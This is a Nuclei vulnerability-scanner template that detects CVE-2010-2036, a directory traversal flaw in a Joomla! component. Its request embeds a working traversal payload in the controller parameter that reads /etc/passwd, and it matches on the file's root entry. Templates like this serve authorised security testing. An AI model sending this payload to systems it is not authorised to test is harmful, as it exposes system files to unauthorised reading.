nuclei-templates/cves/2010/CVE-2010-2036.yaml

28 lines
871 B
YAML
Raw Normal View History

2021-08-19 23:58:33 +00:00
id: CVE-2010-2036
info:
name: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
2021-08-19 23:58:33 +00:00
- https://www.exploit-db.com/exploits/34004
- https://www.cvedetails.com/cve/CVE-2010-2036
tags: cve,cve2010,lfi,joomla
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200